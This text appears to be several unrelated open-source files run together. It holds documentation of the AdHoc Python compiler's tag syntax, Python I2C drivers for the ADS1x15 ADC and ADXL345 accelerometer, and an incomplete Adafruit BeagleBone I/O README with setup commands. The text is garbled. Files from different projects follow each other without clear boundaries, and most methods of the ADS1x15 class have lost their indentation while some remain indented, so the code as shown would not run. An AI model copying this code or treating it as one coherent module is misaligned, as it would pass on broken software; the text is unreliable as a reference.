All *AdHoc* tags are enclosed in delimiters (default: |@:| and |:@|). E.g:
|@:|\ adhoc\ |:@|
Delimiters come in several flavors, namely line and section
delimiters and a set of macro delimiters. By default, line and
section delimiters are the same, but they can be defined separately.
`Flags`_ are tagged lines, which denote a single option or
command. E.g.:
| import module # |@:|\ adhoc\ |:@|
| # |@:|\ adhoc_self\ |:@| my_module_name
`Sections`_ are tagged line pairs, which delimit a block of
text. The first tagged line opens the section, the second tagged
line closes the section. E.g.:
| # |@:|\ adhoc_enable\ |:@|
| # disabled_command()
| # |@:|\ adhoc_enable\ |:@|
`Macros`_ have their own delimiters (default: |@m| and |m>|). E.g.:
| # |@m|\ MACRO_NAME\ |m>|
The implementation is realized as class :class:`adhoc.AdHoc` which
is mainly used as a namespace. The run-time part of
:class:`adhoc.AdHoc` -- which handles module import and file export
-- is included verbatim as class :class:`RtAdHoc` in the generated
output.
Flags
-----
:|adhoc_run_time|:
The place where the *AdHoc* run-time code is added. This flag must
be present in files, which use the |adhoc| import feature. It
is not needed for the enable/disable features.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_run_time|
:|adhoc| [force] [flat | full]:
Mark import line for run-time compilation.
If ``force`` is specified, the module is imported, even if it
was imported before.
If ``flat`` is specified, the module is not recursively
exported.
If ``full`` is specified, the module is recursively
exported. (This parameter takes priority over ``flat``).
If neither ``flat`` nor ``full`` are specified,
:attr:`adhoc.AdHoc.flat` determines the export scope.
This flag is ignored, if the line is commented out. E.g.:
| # import module # |adhoc|
.. _adhoc_include:
:|adhoc_include| file_spec, ...:
Include files for unpacking. ``file_spec`` is one of
:file:
``file`` is used for both input and output.
:file ``from`` default-file:
``file`` is used for input and output. if ``file`` does not
exist, ``default-file`` is used for input.
:source-file ``as`` output-file:
``source-file`` is used for input. ``output-file`` is used for
output. If ``source-file`` does not exist, ``output-file`` is
used for input also.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_include| file
:|adhoc_verbatim| [flags] file_spec, ...:
Include files for verbatim extraction. See adhoc_include_ for
``file_spec``.
The files are included as |adhoc_template_v| sections. *file* is used
as *export_file* mark. If *file* is ``--``, the template disposition
becomes standard output.
Optional flags can be any combination of ``[+|-]NUM`` for
indentation and ``#`` for commenting. E.g.:
| # |adhoc_verbatim| +4# my_file from /dev/null
*my_file* (or ``/dev/null``) is read, commented and indented 4
spaces.
If the |adhoc_verbatim| tag is already indented, the specified
indentation is subtracted.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_verbatim| file
:|adhoc_self| name ...:
Mark name(s) as currently compiling. This is useful, if
``__init__.py`` imports other module parts. E.g:
| import pyjsmo # |@:|\ adhoc\ |:@|
where ``pyjsmo/__init__.py`` contains:
| # |@:|\ adhoc_self\ |:@| pyjsmo
| from pyjsmo.base import * # |@:|\ adhoc\ |:@|
:|adhoc_compiled|:
If present, no compilation is done on this file. This flag is
added by the compiler to the run-time version.
Sections
--------
:|adhoc_enable|:
Leading comment char and exactly one space are removed from lines
in these sections.
:|adhoc_disable|:
A comment char and exactly one space are added to non-blank
lines in these sections.
:|adhoc_template| -mark | export_file:
If mark starts with ``-``, the output disposition is standard output
and the template is ignored, when exporting.
Otherwise, the template is written to output_file during export.
All template parts with the same mark/export_file are concatenated
to a single string.
:|adhoc_template_v| export_file:
Variation of |adhoc_template|. Automatically generated by |adhoc_verbatim|.
:|adhoc_uncomment|:
Treated like |adhoc_enable| before template output.
:|adhoc_indent| [+|-]NUM:
Add or remove indentation before template output.
:|adhoc_import|:
Imported files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_unpack|:
Included files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_remove|:
Added sections are marked as such by the compiler. Removal is
done when exporting.
Before compilation, existing |adhoc_remove| tags are renamed to
|adhoc_remove_|.
After automatically added |adhoc_remove| sections have been
removed during export, remaining |adhoc_remove_| tags are
renamed to |adhoc_remove| again.
.. note:: Think twice, before removing material from original
sources at compile time. It will violate the condition
``xsource_i === source_i``.
:|adhoc_run_time_engine|:
The run-time class :class:`RtAdHoc` is enclosed in this special
template section.
It is exported as ``rt_adhoc.py`` during export.
Macros
------
Macros are defined programmatically::
AdHoc.macros[MACRO_NAME] = EXPANSION_STRING
A macro is invoked by enclosing a MACRO_NAME in
:attr:`adhoc.AdHoc.macro_call_delimiters`. (Default: |@m|, |m>|).
:|MACRO_NAME|:
Macro call.
Internal
--------
:|adhoc_run_time_class|:
Marks the beginning of the run-time class. This is only
  recognized in the *AdHoc* program/module.
:|adhoc_run_time_section|:
All sections are concatenated and used as run-time code. This is
  only recognized in the *AdHoc* program/module.
In order to preserve the ``xsource_i === source_i`` bijective
condition, macros are expanded/collapsed with special macro
definition sections. (See :attr:`adhoc.AdHoc.macro_xdef_delimiters`;
Default: |<m|, |m@|).
:|adhoc_macro_call|:
Macro call section.
:|adhoc_macro_expansion|:
Macro expansion section.
.. include:: USE_CASES.txt
AdHoc Script
============
.. automodule:: adhoc
:members:
:show-inheritance:
.. _namespace_dict:
NameSpace/NameSpaceDict
=======================
.. automodule:: namespace_dict
:members:
:show-inheritance:
.. |adhoc_self| replace:: |@:|\ ``adhoc_self``\ |:@|
.. |adhoc_include| replace:: |@:|\ ``adhoc_include``\ |:@|
.. |adhoc_verbatim| replace:: |@:|\ ``adhoc_verbatim``\ |:@|
.. |adhoc_compiled| replace:: |@:|\ ``adhoc_compiled``\ |:@|
.. |adhoc_enable| replace:: |@:|\ ``adhoc_enable``\ |:@|
.. |adhoc_disable| replace:: |@:|\ ``adhoc_disable``\ |:@|
.. |adhoc_template| replace:: |@:|\ ``adhoc_template``\ |:@|
.. |adhoc_template_v| replace:: |@:|\ ``adhoc_template_v``\ |:@|
.. |adhoc_uncomment| replace:: |@:|\ ``adhoc_uncomment``\ |:@|
.. |adhoc_indent| replace:: |@:|\ ``adhoc_indent``\ |:@|
.. |adhoc_import| replace:: |@:|\ ``adhoc_import``\ |:@|
.. |adhoc_unpack| replace:: |@:|\ ``adhoc_unpack``\ |:@|
.. |adhoc_remove| replace:: |@:|\ ``adhoc_remove``\ |:@|
.. |adhoc_remove_| replace:: |@:|\ ``adhoc_remove_``\ |:@|
.. |adhoc_run_time_class| replace:: |@:|\ ``adhoc_run_time_class``\ |:@|
.. |adhoc_run_time_section| replace:: |@:|\ ``adhoc_run_time_section``\ |:@|
.. |adhoc_run_time_engine| replace:: |@:|\ ``adhoc_run_time_engine``\ |:@|
.. |@m| replace:: ``@|:``
.. |m>| replace:: ``:|>``
.. |<m| replace:: ``<|:``
.. |m@| replace:: ``:|@``
.. |MACRO_NAME| replace:: |@m|\ ``MACRO_NAME``\ |m>|
.. |adhoc_macro_call| replace:: |<m|\ ``adhoc_macro_call``\ |m@|
.. |adhoc_macro_expansion| replace:: |<m|\ ``adhoc_macro_expansion``\ |m@|
| AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/doc/index.rst | index.rst |
import time
# Register and other configuration values:
ADS1x15_DEFAULT_ADDRESS = 0x48
ADS1x15_POINTER_CONVERSION = 0x00
ADS1x15_POINTER_CONFIG = 0x01
ADS1x15_POINTER_LOW_THRESHOLD = 0x02
ADS1x15_POINTER_HIGH_THRESHOLD = 0x03
# Config register: "operational status" bit -- start a single conversion.
ADS1x15_CONFIG_OS_SINGLE = 0x8000
# Bit offset of the input multiplexer field in the config register.
ADS1x15_CONFIG_MUX_OFFSET = 12
# Mapping of gain values to config register values.
# NOTE(review): the 2/3 key evaluates to 0 under Python 2 integer
# division and to 0.666... under Python 3; lookups spell the gain the
# same way, so both resolve consistently -- confirm if Python 2
# support matters.
ADS1x15_CONFIG_GAIN = {
    2/3: 0x0000,
    1: 0x0200,
    2: 0x0400,
    4: 0x0600,
    8: 0x0800,
    16: 0x0A00
}
ADS1x15_CONFIG_MODE_CONTINUOUS = 0x0000
ADS1x15_CONFIG_MODE_SINGLE = 0x0100
# Mapping of data/sample rate to config register values for ADS1015 (faster).
ADS1015_CONFIG_DR = {
    128: 0x0000,
    250: 0x0020,
    490: 0x0040,
    920: 0x0060,
    1600: 0x0080,
    2400: 0x00A0,
    3300: 0x00C0
}
# Mapping of data/sample rate to config register values for ADS1115 (slower).
ADS1115_CONFIG_DR = {
    8: 0x0000,
    16: 0x0020,
    32: 0x0040,
    64: 0x0060,
    128: 0x0080,
    250: 0x00A0,
    475: 0x00C0,
    860: 0x00E0
}
# Comparator configuration bits and assertion-count values.
ADS1x15_CONFIG_COMP_WINDOW = 0x0010
ADS1x15_CONFIG_COMP_ACTIVE_HIGH = 0x0008
ADS1x15_CONFIG_COMP_LATCHING = 0x0004
ADS1x15_CONFIG_COMP_QUE = {
    1: 0x0000,
    2: 0x0001,
    4: 0x0002
}
ADS1x15_CONFIG_COMP_QUE_DISABLE = 0x0003
class ADS1x15(object):
"""Base functionality for ADS1x15 analog to digital converters."""
    def __init__(self, address=ADS1x15_DEFAULT_ADDRESS, i2c=None, **kwargs):
        """Create an ADS1x15 device at the given I2C address.

        :param address: I2C address of the chip (default 0x48).
        :param i2c: I2C bus provider; when None, Adafruit_GPIO.I2C is
            imported lazily and used.  Remaining keyword arguments are
            passed through to ``get_i2c_device``.
        """
        if i2c is None:
            # Import here so the dependency is only required when the
            # caller does not inject its own I2C provider.
            import Adafruit_GPIO.I2C as I2C
            i2c = I2C
        self._device = i2c.get_i2c_device(address, **kwargs)
def _data_rate_default(self):
"""Retrieve the default data rate for this ADC (in samples per second).
Should be implemented by subclasses.
"""
raise NotImplementedError('Subclasses must implement _data_rate_default!')
def _data_rate_config(self, data_rate):
"""Subclasses should override this function and return a 16-bit value
that can be OR'ed with the config register to set the specified
data rate. If a value of None is specified then a default data_rate
setting should be returned. If an invalid or unsupported data_rate is
provided then an exception should be thrown.
"""
raise NotImplementedError('Subclass must implement _data_rate_config function!')
def _conversion_value(self, low, high):
"""Subclasses should override this function that takes the low and high
byte of a conversion result and returns a signed integer value.
"""
raise NotImplementedError('Subclass must implement _conversion_value function!')
def _read(self, mux, gain, data_rate, mode):
"""Perform an ADC read with the provided mux, gain, data_rate, and mode
values. Returns the signed integer result of the read.
"""
config = ADS1x15_CONFIG_OS_SINGLE # Go out of power-down mode for conversion.
# Specify mux value.
config |= (mux & 0x07) << ADS1x15_CONFIG_MUX_OFFSET
# Validate the passed in gain and then set it in the config.
if gain not in ADS1x15_CONFIG_GAIN:
raise ValueError('Gain must be one of: 2/3, 1, 2, 4, 8, 16')
config |= ADS1x15_CONFIG_GAIN[gain]
# Set the mode (continuous or single shot).
config |= mode
# Get the default data rate if none is specified (default differs between
# ADS1015 and ADS1115).
if data_rate is None:
data_rate = self._data_rate_default()
# Set the data rate (this is controlled by the subclass as it differs
# between ADS1015 and ADS1115).
config |= self._data_rate_config(data_rate)
config |= ADS1x15_CONFIG_COMP_QUE_DISABLE # Disble comparator mode.
# Send the config value to start the ADC conversion.
# Explicitly break the 16-bit value down to a big endian pair of bytes.
self._device.writeList(ADS1x15_POINTER_CONFIG, [(config >> 8) & 0xFF, config & 0xFF])
# Wait for the ADC sample to finish based on the sample rate plus a
# small offset to be sure (0.1 millisecond).
time.sleep(1.0/data_rate+0.0001)
# Retrieve the result.
result = self._device.readList(ADS1x15_POINTER_CONVERSION, 2)
return self._conversion_value(result[1], result[0])
def _read_comparator(self, mux, gain, data_rate, mode, high_threshold,
low_threshold, active_low, traditional, latching,
num_readings):
"""Perform an ADC read with the provided mux, gain, data_rate, and mode
values and with the comparator enabled as specified. Returns the signed
integer result of the read.
"""
assert num_readings == 1 or num_readings == 2 or num_readings == 4, 'Num readings must be 1, 2, or 4!'
# Set high and low threshold register values.
self._device.writeList(ADS1x15_POINTER_HIGH_THRESHOLD, [(high_threshold >> 8) & 0xFF, high_threshold & 0xFF])
self._device.writeList(ADS1x15_POINTER_LOW_THRESHOLD, [(low_threshold >> 8) & 0xFF, low_threshold & 0xFF])
# Now build up the appropriate config register value.
config = ADS1x15_CONFIG_OS_SINGLE # Go out of power-down mode for conversion.
# Specify mux value.
config |= (mux & 0x07) << ADS1x15_CONFIG_MUX_OFFSET
# Validate the passed in gain and then set it in the config.
if gain not in ADS1x15_CONFIG_GAIN:
raise ValueError('Gain must be one of: 2/3, 1, 2, 4, 8, 16')
config |= ADS1x15_CONFIG_GAIN[gain]
# Set the mode (continuous or single shot).
config |= mode
# Get the default data rate if none is specified (default differs between
# ADS1015 and ADS1115).
if data_rate is None:
data_rate = self._data_rate_default()
# Set the data rate (this is controlled by the subclass as it differs
# between ADS1015 and ADS1115).
config |= self._data_rate_config(data_rate)
# Enable window mode if required.
if not traditional:
config |= ADS1x15_CONFIG_COMP_WINDOW
# Enable active high mode if required.
if not active_low:
config |= ADS1x15_CONFIG_COMP_ACTIVE_HIGH
# Enable latching mode if required.
if latching:
config |= ADS1x15_CONFIG_COMP_LATCHING
# Set number of comparator hits before alerting.
config |= ADS1x15_CONFIG_COMP_QUE[num_readings]
# Send the config value to start the ADC conversion.
# Explicitly break the 16-bit value down to a big endian pair of bytes.
self._device.writeList(ADS1x15_POINTER_CONFIG, [(config >> 8) & 0xFF, config & 0xFF])
# Wait for the ADC sample to finish based on the sample rate plus a
# small offset to be sure (0.1 millisecond).
time.sleep(1.0/data_rate+0.0001)
# Retrieve the result.
result = self._device.readList(ADS1x15_POINTER_CONVERSION, 2)
return self._conversion_value(result[1], result[0])
def read_adc(self, channel, gain=1, data_rate=None):
"""Read a single ADC channel and return the ADC value as a signed integer
result. Channel must be a value within 0-3.
"""
assert 0 <= channel <= 3, 'Channel must be a value within 0-3!'
# Perform a single shot read and set the mux value to the channel plus
# the highest bit (bit 3) set.
return self._read(channel + 0x04, gain, data_rate, ADS1x15_CONFIG_MODE_SINGLE)
def read_adc_difference(self, differential, gain=1, data_rate=None):
"""Read the difference between two ADC channels and return the ADC value
as a signed integer result. Differential must be one of:
- 0 = Channel 0 minus channel 1
- 1 = Channel 0 minus channel 3
- 2 = Channel 1 minus channel 3
- 3 = Channel 2 minus channel 3
"""
assert 0 <= differential <= 3, 'Differential must be a value within 0-3!'
# Perform a single shot read using the provided differential value
# as the mux value (which will enable differential mode).
return self._read(differential, gain, data_rate, ADS1x15_CONFIG_MODE_SINGLE)
def start_adc(self, channel, gain=1, data_rate=None):
"""Start continuous ADC conversions on the specified channel (0-3). Will
return an initial conversion result, then call the get_last_result()
function to read the most recent conversion result. Call stop_adc() to
stop conversions.
"""
assert 0 <= channel <= 3, 'Channel must be a value within 0-3!'
# Start continuous reads and set the mux value to the channel plus
# the highest bit (bit 3) set.
return self._read(channel + 0x04, gain, data_rate, ADS1x15_CONFIG_MODE_CONTINUOUS)
def start_adc_difference(self, differential, gain=1, data_rate=None):
"""Start continuous ADC conversions between two ADC channels. Differential
must be one of:
- 0 = Channel 0 minus channel 1
- 1 = Channel 0 minus channel 3
- 2 = Channel 1 minus channel 3
- 3 = Channel 2 minus channel 3
Will return an initial conversion result, then call the get_last_result()
function continuously to read the most recent conversion result. Call
stop_adc() to stop conversions.
"""
assert 0 <= differential <= 3, 'Differential must be a value within 0-3!'
# Perform a single shot read using the provided differential value
# as the mux value (which will enable differential mode).
return self._read(differential, gain, data_rate, ADS1x15_CONFIG_MODE_CONTINUOUS)
def start_adc_comparator(self, channel, high_threshold, low_threshold,
gain=1, data_rate=None, active_low=True,
traditional=True, latching=False, num_readings=1):
"""Start continuous ADC conversions on the specified channel (0-3) with
the comparator enabled. When enabled the comparator to will check if
the ADC value is within the high_threshold & low_threshold value (both
should be signed 16-bit integers) and trigger the ALERT pin. The
behavior can be controlled by the following parameters:
- active_low: Boolean that indicates if ALERT is pulled low or high
when active/triggered. Default is true, active low.
- traditional: Boolean that indicates if the comparator is in traditional
mode where it fires when the value is within the threshold,
or in window mode where it fires when the value is _outside_
the threshold range. Default is true, traditional mode.
- latching: Boolean that indicates if the alert should be held until
get_last_result() is called to read the value and clear
the alert. Default is false, non-latching.
- num_readings: The number of readings that match the comparator before
triggering the alert. Can be 1, 2, or 4. Default is 1.
Will return an initial conversion result, then call the get_last_result()
function continuously to read the most recent conversion result. Call
stop_adc() to stop conversions.
"""
assert 0 <= channel <= 3, 'Channel must be a value within 0-3!'
# Start continuous reads with comparator and set the mux value to the
# channel plus the highest bit (bit 3) set.
return self._read_comparator(channel + 0x04, gain, data_rate,
ADS1x15_CONFIG_MODE_CONTINUOUS,
high_threshold, low_threshold, active_low,
traditional, latching, num_readings)
def start_adc_difference_comparator(self, differential, high_threshold, low_threshold,
gain=1, data_rate=None, active_low=True,
traditional=True, latching=False, num_readings=1):
"""Start continuous ADC conversions between two channels with
the comparator enabled. See start_adc_difference for valid differential
parameter values and their meaning. When enabled the comparator to will
check if the ADC value is within the high_threshold & low_threshold value
(both should be signed 16-bit integers) and trigger the ALERT pin. The
behavior can be controlled by the following parameters:
- active_low: Boolean that indicates if ALERT is pulled low or high
when active/triggered. Default is true, active low.
- traditional: Boolean that indicates if the comparator is in traditional
mode where it fires when the value is within the threshold,
or in window mode where it fires when the value is _outside_
the threshold range. Default is true, traditional mode.
- latching: Boolean that indicates if the alert should be held until
get_last_result() is called to read the value and clear
the alert. Default is false, non-latching.
- num_readings: The number of readings that match the comparator before
triggering the alert. Can be 1, 2, or 4. Default is 1.
Will return an initial conversion result, then call the get_last_result()
function continuously to read the most recent conversion result. Call
stop_adc() to stop conversions.
"""
assert 0 <= differential <= 3, 'Differential must be a value within 0-3!'
# Start continuous reads with comparator and set the mux value to the
# channel plus the highest bit (bit 3) set.
return self._read_comparator(differential, gain, data_rate,
ADS1x15_CONFIG_MODE_CONTINUOUS,
high_threshold, low_threshold, active_low,
traditional, latching, num_readings)
def stop_adc(self):
"""Stop all continuous ADC conversions (either normal or difference mode).
"""
# Set the config register to its default value of 0x8583 to stop
# continuous conversions.
config = 0x8583
self._device.writeList(ADS1x15_POINTER_CONFIG, [(config >> 8) & 0xFF, config & 0xFF])
def get_last_result(self):
"""Read the last conversion result when in continuous conversion mode.
Will return a signed integer value.
"""
# Retrieve the conversion register value, convert to a signed int, and
# return it.
result = self._device.readList(ADS1x15_POINTER_CONVERSION, 2)
return self._conversion_value(result[1], result[0])
class ADS1115(ADS1x15):
    """ADS1115 16-bit analog to digital converter instance."""

    def __init__(self, *args, **kwargs):
        super(ADS1115, self).__init__(*args, **kwargs)

    def _data_rate_default(self):
        """Default sample rate from the datasheet (page 16, DR bit default)."""
        return 128

    def _data_rate_config(self, data_rate):
        """Look up the config register bits for the requested sample rate."""
        try:
            return ADS1115_CONFIG_DR[data_rate]
        except KeyError:
            raise ValueError('Data rate must be one of: 8, 16, 32, 64, 128, 250, 475, 860')

    def _conversion_value(self, low, high):
        """Combine the two result bytes into a signed 16-bit reading."""
        raw = ((high & 0xFF) << 8) | (low & 0xFF)
        # Two's-complement sign extension for a 16-bit value.
        return raw - (1 << 16) if raw & 0x8000 else raw
class ADS1015(ADS1x15):
    """ADS1015 12-bit analog to digital converter instance."""

    def __init__(self, *args, **kwargs):
        super(ADS1015, self).__init__(*args, **kwargs)

    def _data_rate_default(self):
        # Default from datasheet page 19, config register DR bit default.
        return 1600

    def _data_rate_config(self, data_rate):
        """Look up the config register bits for the requested sample rate."""
        if data_rate not in ADS1015_CONFIG_DR:
            raise ValueError('Data rate must be one of: 128, 250, 490, 920, 1600, 2400, 3300')
        return ADS1015_CONFIG_DR[data_rate]

    def _conversion_value(self, low, high):
        """Combine the result bytes into a signed 12-bit value.

        The 12-bit result is left-justified in the 16-bit register, so the
        low byte's top nibble holds the least significant bits.
        """
        value = ((high & 0xFF) << 4) | ((low & 0xFF) >> 4)
        # Check for sign bit and turn into a negative value if set.
        if value & 0x800 != 0:
            value -= 1 << 12
        return value
import struct
# Minimal constants carried over from Arduino library
ADXL345_ADDRESS = 0x53
ADXL345_REG_DEVID = 0x00  # Device ID
ADXL345_REG_DATAX0 = 0x32  # X-axis data 0 (6 bytes for X/Y/Z)
ADXL345_REG_POWER_CTL = 0x2D  # Power-saving features control
ADXL345_REG_DATA_FORMAT = 0x31
ADXL345_REG_BW_RATE = 0x2C
# Output data rate selections for the BW_RATE register.
ADXL345_DATARATE_0_10_HZ = 0x00
ADXL345_DATARATE_0_20_HZ = 0x01
ADXL345_DATARATE_0_39_HZ = 0x02
ADXL345_DATARATE_0_78_HZ = 0x03
ADXL345_DATARATE_1_56_HZ = 0x04
ADXL345_DATARATE_3_13_HZ = 0x05
ADXL345_DATARATE_6_25HZ = 0x06
ADXL345_DATARATE_12_5_HZ = 0x07
ADXL345_DATARATE_25_HZ = 0x08
ADXL345_DATARATE_50_HZ = 0x09
ADXL345_DATARATE_100_HZ = 0x0A  # (default)
ADXL345_DATARATE_200_HZ = 0x0B
ADXL345_DATARATE_400_HZ = 0x0C
ADXL345_DATARATE_800_HZ = 0x0D
ADXL345_DATARATE_1600_HZ = 0x0E
ADXL345_DATARATE_3200_HZ = 0x0F
# Measurement range selections for the DATA_FORMAT register.
ADXL345_RANGE_2_G = 0x00  # +/- 2g (default)
ADXL345_RANGE_4_G = 0x01  # +/- 4g
ADXL345_RANGE_8_G = 0x02  # +/- 8g
ADXL345_RANGE_16_G = 0x03  # +/- 16g


class ADXL345(object):
    """ADXL345 triple-axis accelerometer."""

    def __init__(self, address=ADXL345_ADDRESS, i2c=None, **kwargs):
        """Initialize the ADXL345 accelerometer using its I2C interface.

        Raises RuntimeError when the device ID register does not match the
        expected ADXL345 value (0xE5).
        """
        # Setup I2C interface for the device.
        if i2c is None:
            import Adafruit_GPIO.I2C as I2C
            i2c = I2C
        self._device = i2c.get_i2c_device(address, **kwargs)
        # Check that the accelerometer is connected, then enable it
        # (set the Measure bit in POWER_CTL).
        if self._device.readU8(ADXL345_REG_DEVID) == 0xE5:
            self._device.write8(ADXL345_REG_POWER_CTL, 0x08)
        else:
            raise RuntimeError('Failed to find the expected device ID register value, check your wiring.')

    def set_range(self, value):
        """Set the range of the accelerometer to the provided value.  Range value
        should be one of these constants:
          - ADXL345_RANGE_2_G   = +/-2G
          - ADXL345_RANGE_4_G   = +/-4G
          - ADXL345_RANGE_8_G   = +/-8G
          - ADXL345_RANGE_16_G  = +/-16G
        """
        # Read the data format register to preserve bits.  Update the data
        # rate, make sure that the FULL-RES bit is enabled for range scaling
        format_reg = self._device.readU8(ADXL345_REG_DATA_FORMAT) & ~0x0F
        format_reg |= value
        format_reg |= 0x08  # FULL-RES bit enabled
        # Write the updated format register.
        self._device.write8(ADXL345_REG_DATA_FORMAT, format_reg)

    def get_range(self):
        """Retrieve the current range of the accelerometer.  See set_range for
        the possible range constant values that will be returned.
        """
        return self._device.readU8(ADXL345_REG_DATA_FORMAT) & 0x03

    def set_data_rate(self, rate):
        """Set the data rate of the accelerometer.  Rate should be one of the
        following constants:
          - ADXL345_DATARATE_0_10_HZ = 0.1 hz
          - ADXL345_DATARATE_0_20_HZ = 0.2 hz
          - ADXL345_DATARATE_0_39_HZ = 0.39 hz
          - ADXL345_DATARATE_0_78_HZ = 0.78 hz
          - ADXL345_DATARATE_1_56_HZ = 1.56 hz
          - ADXL345_DATARATE_3_13_HZ = 3.13 hz
          - ADXL345_DATARATE_6_25HZ  = 6.25 hz
          - ADXL345_DATARATE_12_5_HZ = 12.5 hz
          - ADXL345_DATARATE_25_HZ   = 25 hz
          - ADXL345_DATARATE_50_HZ   = 50 hz
          - ADXL345_DATARATE_100_HZ  = 100 hz
          - ADXL345_DATARATE_200_HZ  = 200 hz
          - ADXL345_DATARATE_400_HZ  = 400 hz
          - ADXL345_DATARATE_800_HZ  = 800 hz
          - ADXL345_DATARATE_1600_HZ = 1600 hz
          - ADXL345_DATARATE_3200_HZ = 3200 hz
        """
        # Note: The LOW_POWER bits are currently ignored,
        # we always keep the device in 'normal' mode
        self._device.write8(ADXL345_REG_BW_RATE, rate & 0x0F)

    def get_data_rate(self):
        """Retrieve the current data rate.  See set_data_rate for the possible
        data rate constant values that will be returned.
        """
        return self._device.readU8(ADXL345_REG_BW_RATE) & 0x0F

    def read(self):
        """Read the current value of the accelerometer and return it as a tuple
        of signed 16-bit X, Y, Z axis values.
        """
        raw = self._device.readList(ADXL345_REG_DATAX0, 6)
        # Data is three consecutive little-endian signed 16-bit values.
        return struct.unpack('<hhh', raw)
# Adafruit Beaglebone I/O Python API
[](http://adafruit-beaglebone-io-python.readthedocs.io/en/latest/?badge=latest)
[](https://badge.fury.io/py/Adafruit_BBIO)
[](https://pypi.python.org/pypi/Adafruit_BBIO/)
Adafruit BBIO is an API to enable [GPIO](README.md#gpio-setup), [PWM](README.md#pwm), [ADC](README.md#adc), [UART](README.md#uart), [SPI](README.md#spi) and [eQEP](README.md#eqep) (Quadrature Encoder) hardware access from Python applications running on the Beaglebone.
* It is recommended to use an [official BeagleBoard.org Debian image](https://beagleboard.org/latest-images)
* **Currently recommended image: [Debian 10.3 "Buster" IoT (2020-04-06)](http://beagleboard.org/latest-images)** _(default kernel is 4.19.x-ti)_
* Adafruit_BBIO supports Linux kernels 3.8 through 4.19
* New versions of Adafruit_BBIO may break backwards compatibility. Please read the [changelog](CHANGELOG.md).
* It is recommended to use Python 3
## Installation on Debian
Note: Follow the instructions on BeagleBoard.org to [get connected to the Internet](https://beagleboard.org/upgrade#connect)
**Easiest:**
```
sudo apt-get update
sudo apt-get install build-essential python3-dev python3-pip -y
sudo pip3 install Adafruit_BBIO
```
**Manual:**
```
sudo apt-get update
sudo apt-get install build-essential python3-dev python3-pip -y
git clone git://github.com/adafruit/adafruit-beaglebone-io-python.git
cd adafruit-beaglebone-io-python
sudo python3 setup.py install
```
Upgrade Adafruit_BBIO to latest version on [PyPI](https://pypi.python.org/pypi/Adafruit_BBIO):
```
sudo pip3 install --upgrade Adafruit_BBIO
```
## Usage
Using the library is very similar to the excellent RPi.GPIO library used on the Raspberry Pi. Below are some examples.
### Pin Numbers
Please note that there is no '0' prefix for the pin numbers. For example, pin 7 on header P8 is `P8_7`.
**Correct:**
```
GPIO.setup("P8_7", OUT )
```
**INCORRECT:**
```
GPIO.setup("P8_07", OUT )
```
Refer to `pins_t table[]` in [common.c](https://github.com/adafruit/adafruit-beaglebone-io-python/blob/master/source/common.c#L73) for all the pin labels.
### config-pin
[config-pin](https://github.com/beagleboard/bb.org-overlays/tree/master/tools/beaglebone-universal-io) is now used on the official BeagleBoard.org Debian Jessie and Stretch images to control pin mode (e.g. pin mux).
```
debian@beaglebone:~$ config-pin -q P9_14
P9_14 Mode: pwm
debian@beaglebone:~$ config-pin -l P9_14
default gpio gpio_pu gpio_pd pwm
debian@beaglebone:~$ config-pin P9_14 gpio
debian@beaglebone:~$ config-pin -q P9_14
P9_14 Mode: gpio Direction: in Value: 0
debian@beaglebone:~$ config-pin P9_14 pwm
debian@beaglebone:~$ config-pin -q P9_14
P9_14 Mode: pwm
```
### GPIO Setup
Import the library, and setup as GPIO.OUT or GPIO.IN::
import Adafruit_BBIO.GPIO as GPIO
GPIO.setup("P8_14", GPIO.OUT)
You can also refer to the pin names::
GPIO.setup("GPIO0_26", GPIO.OUT)
### GPIO Output
Setup the pin for output, and write GPIO.HIGH or GPIO.LOW. Or you can use 1 or 0.::
import Adafruit_BBIO.GPIO as GPIO
GPIO.setup("P8_14", GPIO.OUT)
GPIO.output("P8_14", GPIO.HIGH)
### On-Board LEDs
On-board LEDs (USR0-USR3) are handled by LED class driver rather than the GPIO pin driver.
They have a different path in the /sys/ filesystem.
Setup the pin for output and write GPIO.HIGH or GPIO.LOW::
import Adafruit_BBIO.GPIO as GPIO
import time
for i in range(4):
GPIO.setup("USR%d" % i, GPIO.OUT)
while True:
for i in range(4):
GPIO.output("USR%d" % i, GPIO.HIGH)
time.sleep(1)
for i in range(4):
GPIO.output("USR%d" % i, GPIO.LOW)
time.sleep(1)
### GPIO Input
Inputs work similarly to outputs.:
import Adafruit_BBIO.GPIO as GPIO
GPIO.setup("P8_14", GPIO.IN)
Polling inputs:
if GPIO.input("P8_14"):
print("HIGH")
else:
print("LOW")
Waiting for an edge (GPIO.RISING, GPIO.FALLING, or GPIO.BOTH:
GPIO.wait_for_edge(channel, GPIO.RISING)
or
GPIO.wait_for_edge(channel, GPIO.RISING, timeout)
Detecting events:
GPIO.add_event_detect("P9_12", GPIO.FALLING)
#your amazing code here
#detect wherever:
if GPIO.event_detected("P9_12"):
print("event detected!")
### PWM
**The PWM Duty Cycle range was reversed in 0.0.15 from 100(off)-0(on) to 0(off)-100(on). Please update your code accordingly.**
import Adafruit_BBIO.PWM as PWM
#PWM.start(channel, duty, freq=2000, polarity=0)
#duty values are valid 0 (off) to 100 (on)
PWM.start("P9_14", 50)
PWM.set_duty_cycle("P9_14", 25.5)
PWM.set_frequency("P9_14", 10)
PWM.stop("P9_14")
PWM.cleanup()
#set polarity to 1 on start:
PWM.start("P9_14", 50, 2000, 1)
### ADC
import Adafruit_BBIO.ADC as ADC
ADC.setup()
#read returns values 0-1.0
value = ADC.read("P9_40")
#read_raw returns non-normalized value
value = ADC.read_raw("P9_40")
### [UART](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart)
* Use [`config-pin` to set pin mode](https://github.com/beagleboard/bb.org-overlays/tree/master/tools/beaglebone-universal-io) for [UART1 and UART2 pins](http://beagleboard.org/static/images/cape-headers-serial.png)
```
config-pin P9.21 uart # UART2_TXD
config-pin P9.22 uart # UART2_RXD
config-pin P9.24 uart # UART1_TXD
config-pin P9.26 uart # UART1_RXD
```
* [Install pyserial](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart#using-uart-with-python)
```
sudo pip install pyserial
```
* [Test UART1](https://learn.adafruit.com/setting-up-io-python-library-on-beaglebone-black/uart#using-uart-with-python)
```
import Adafruit_BBIO.UART as UART
import serial
UART.setup("UART1")
